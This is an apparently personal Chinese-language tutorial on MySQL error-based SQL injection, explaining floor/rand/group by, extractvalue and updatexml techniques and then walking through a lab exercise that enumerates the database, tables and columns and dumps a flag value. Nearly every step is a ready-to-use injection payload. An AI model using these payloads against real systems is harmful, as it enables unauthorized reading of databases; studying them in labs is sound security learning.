为什么要浅析呢,说得好听叫浅析,说得难听就是没彻底搞懂原理。
粗略的知道为什么并且使用。
好吧目前追求就酱。


1.floor报错:

这是网上的floor报错注入模板:

select * from user where User='root' and(select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from user group by x)a)

然后逐条分析:
1.使用count返回查询条目数

-- SELECT count(*) FROM user;

微信截图_20200325233539.png


2.单独使用group对查询结果进行分组

-- Select * from User GROUP BY User;

微信截图_20200325234050.png


3.给group by 传入特定随机数,配合count 实现报错

-- SELECT count(*) FROM user GROUP BY FLOOR(rand(0)*2);

微信截图_20200325235006.png


4.把查询语句和随机数concat拼接起来

-- SELECT count(*),concat(database(),FLOOR(rand(0)*2))x FROM user GROUP BY x;

微信截图_20200325235152.png


5.套用进查询语句时

select * from user where User='root' and (select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from user group by x)a)

呢么至于为什么floor+count+gourp by就能产生报错。但愿此生有幸吧!狗头..
然后走整数型注入中那个攻击链:查数据库、查表、查字段暴内容。

2.extractvalue报错注入

select * from user where User='root' and extractvalue(1,concat('~', (VERSION())));

extractvalue是对xml文档进行查询。
第二个参数为xpath表达式。如果填写错误表达式内容,那么可以得到我们想要的运行结果:
微信截图_20200326001509.png


3.updatexml报错注入

updatexml是更新xml文档的函数。接收三个参数,第二个就是xml文档路径,
和extractvalue一样,利用错误xpath格式的语句,造成注入。

select * from user where User='root' and updatexml('1',CONCAT('~',DATABASE()),'1')

微信截图_20200326001913.png


技能树报错盲注实战

首先把我们Navicat中的user表改成‘牛逼’视图

1 and (select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

微信截图_20200326012630.png


然后尝试读取数据库中的表:

1 and (select 1 from (select count(*) ,concat((select group_concat(table_name)from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x)a)

微信截图_20200326012830.png


提示:Subquery returns more than 1 row
在这里不能使用group_concat来整合所有数据。那只能一条一条读了:

1 and (select 1 from (select count(*) ,concat((select table_name from information_schema.tables where table_schema=database() limit 1,2),floor(rand(0)*2))x from information_schema.tables group by x)a)

微信截图_20200326013023.png


在这里看到了flag

然后去读字段:

1 and (select 1 from (select count(*) ,concat((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

微信截图_20200326014528.png


然后爆字段值:

1 and (select 1 from (select count(*) ,concat((select flag from sqli.flag),floor(rand(0)*2))x from information_schema.columns group by x)a)

微信截图_20200326014647.png


整个流程就是:
爆数据库,这里不使用information_schema视图也可以。

1 and (select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

然后查表
1 and (select 1 from (select count(*) ,concat((select table_name from information_schema.tables where table_schema=database() limit 1,2),floor(rand(0)*2))x from information_schema.tables group by x)a)

查字段
1 and (select 1 from (select count(*) ,concat((select column_name from information_schema.tables where table_schema=database() and table_name='flag' limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

dump字段数据
1 and (select 1 from (select count(*) ,concat((select flag from sqli.flag),floor(rand(0)*2))x from information_schema.columns group by x)a)

整个完全可以借鉴整数型注入中的方法。只是payload好复杂..
因为整数型注入需要查看回显,所以需要order by 去查有多少个字段,并且判断回显。
不然就会显示失败。

然后是extractvalue方法,因为这个函数最多返回32个字符,所以substring:
微信截图_20200326020722.png


常规获取之后,用subsring获取后面的flag。